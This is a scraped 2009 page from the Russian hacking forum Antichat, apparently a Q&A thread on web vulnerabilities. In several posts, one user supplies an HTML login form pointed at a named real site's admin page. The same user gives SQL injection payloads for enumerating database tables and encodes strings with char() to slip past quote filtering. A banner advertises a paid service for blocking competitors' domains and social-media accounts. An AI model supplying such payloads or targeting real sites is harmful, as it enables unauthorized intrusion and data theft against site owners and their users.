Форум АНТИЧАТ - Ваши вопросы по уязвимостям.

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Ваши вопросы по уязвимостям.

Страница 495 из 1393

495

Опции темы

Поиск в этой теме

Опции просмотра

#4941

23.01.2009, 17:45

BloodyMessage

Участник форума

Регистрация: 20.08.2006

Сообщений: 199

Провел на форуме:
1074298

Репутация: 131

Отправить сообщение для BloodyMessage с помощью ICQ

kevmen, а причем база? Скрипты то фильтруют.

#4942

23.01.2009, 18:01

vampir3a

Новичок

Регистрация: 25.11.2007

Сообщений: 9

Провел на форуме:
107030

Репутация: 1

Всем привет ) подскажите пожалуста , как вызвать ошибку в Phpbb 3 и выше , что бы узнать пусть сайта...
просбовал с 2х версий не выходит

#4943

23.01.2009, 18:16

Iceangel_

Members of Antichat - Level 5

Регистрация: 09.07.2006

Сообщений: 553

Провел на форуме:
7561206

Репутация: 1861

2 BloodyMessage and kevmen
Уточняю, в большинстве подобных случаев никто никого не фильтрует...
Просто на сервере стоит magic_quotes=on, т.е. экранирование кавычек, засчет чего запрос к базе содержащий кавычки портится лишними слешами и поэтому результат запроса возвращает ошибку...
Доходчиво объяснил?

#4944

23.01.2009, 18:19

groundhog

Познавший АНТИЧАТ

Регистрация: 12.05.2007

Сообщений: 1,235

Провел на форуме:
2238549

Репутация: 1318

Отправить сообщение для groundhog с помощью ICQ

Gemini12, сделай такой скриптик:

Код:

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1251"/>
<title>FUCK</title>
<link href="/styles.css" rel="stylesheet" type="text/css">
</head>
<body bgcolor="#008080">
<form action="http://www.hc.kz/admin/index.php" method="post">
Login: <input type="text" name="Username"><br />
Password: <input type="Password" name="Password"><br />
<input type="submit" value="Fuck admin">
</form>
</html>

и вбивай в поле "Логин":

' OR 1=@@VERSION--
' OR 1=(SELECT TOP 1 table_name FROM information_schema.tables)--

Дальше разберёшься?

#4945

23.01.2009, 18:23

Gemini12

Познающий

Регистрация: 24.12.2008

Сообщений: 54

Провел на форуме:
253038

Репутация: 9

Отправить сообщение для Gemini12 с помощью ICQ

Цитата:

Сообщение от BloodyMessage

kevmen, попробуй table_name='user' заменить на TABLE_NAME=CHAR(117,115,101,114)

да и запросы по разному пути
/school/view_cat.php и /view_cat.php

А можно поподробней? Где можно взять эту таблицу значений цифр?

#4946

23.01.2009, 18:27

kevmen

Участник форума

Регистрация: 29.10.2008

Сообщений: 165

Провел на форуме:
397889

Репутация: 60

Отправить сообщение для kevmen с помощью ICQ

Iceangel_,спасибо!Я до этого понять не мог,почему при вводе новостей содержащих кавычки происходило экранирование,благодарю за объяснение!=)

Gemini12,какая таблица значений еще??

кодировщик-декодировщик
http://paulschou.com/tools/xlate/
ищи тут

Последний раз редактировалось kevmen; 23.01.2009 в 18:30..

#4947

23.01.2009, 18:28

sabe

Постоянный

Регистрация: 16.03.2007

Сообщений: 380

Провел на форуме:
1404552

Репутация: 568

Отправить сообщение для sabe с помощью ICQ

Отправить сообщение для sabe с помощью AIM

Отправить сообщение для sabe с помощью Yahoo

Gemini12
закодировать в чар можно здесь
http://www.webfuture.ru/igo/convert.php

#4948

23.01.2009, 18:28

Gemini12

Познающий

Регистрация: 24.12.2008

Сообщений: 54

Провел на форуме:
253038

Репутация: 9

Цитата:

Сообщение от groundhog

Gemini12, сделай такой скриптик:

Код:

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1251"/>
<title>FUCK</title>
<link href="/styles.css" rel="stylesheet" type="text/css">
</head>
<body bgcolor="#008080">
<form action="http://www.hc.kz/admin/index.php" method="post">
Login: <input type="text" name="Username"><br />
Password: <input type="Password" name="Password"><br />
<input type="submit" value="Fuck admin">
</form>
</html>

и вбивай в поле "Логин":

' OR 1=@@VERSION--
' OR 1=(SELECT TOP 1 table_name FROM information_schema.tables)--

Дальше разберёшься?

Чето не совсем понял куда этот скрипт девать

Не мог бы кинуть ссылочку на статейку про этот способ, или объясни ) заранее благодарен...

#4949

23.01.2009, 18:29

kevmen

Участник форума

Регистрация: 29.10.2008

Сообщений: 165

Провел на форуме:
397889

Репутация: 60

Цитата:

Сообщение от BloodyMessage

kevmen, а причем база? Скрипты то фильтруют.

я же написал скрип самописный и никакой фильтрации нет

#4950

23.01.2009, 18:33

groundhog

Познавший АНТИЧАТ

Регистрация: 12.05.2007

Сообщений: 1,235

Провел на форуме:
2238549

Репутация: 1318

Gemini12, чтобы обойти фильтр кавычек, в поле Логин вставляй преобразованные символьные строки:

' OR 1=(SELECT TOP 1 table_name FROM information_schema.tables WHERE table_name!=char(115)+char(104)+char(95)+char(99)+ char(117)+char(115)+char(116)+char(111)+char(109)+ char(101)+char(114)+char(115))--

Страница 495 из 1393

495

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Форумы	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход